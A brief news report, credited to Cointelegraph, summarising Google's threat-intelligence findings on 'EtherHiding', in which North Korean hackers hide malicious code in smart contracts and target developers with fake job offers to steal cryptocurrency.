What is EtherHiding? Google flags malware with crypto-stealing code in smart contracts

Google's Threat Intelligence Group reported that North Korean hackers are using a technique called "EtherHiding" to deploy malware that steals cryptocurrency and sensitive information by embedding malicious code into smart contracts on public blockchain networks. The attack unfolds in two phases: first, hackers compromise a legitimate website using a Loader Script and embed JavaScript code. This code then communicates with a separate malicious package hidden within a smart contract, often triggered when a user interacts with the compromised site. This communication uses a "read-only" function to avoid on-chain detection and minimize fees. The social engineering aspect involves targeting developers with fake job offers, directing them to malicious sites or asking them to download files from repositories like GitHub during technical assessments. Once installed, a second-stage malware called "JADESNOW" steals data, and sometimes a third stage grants long-term network access.

(Source：Cointelegraph)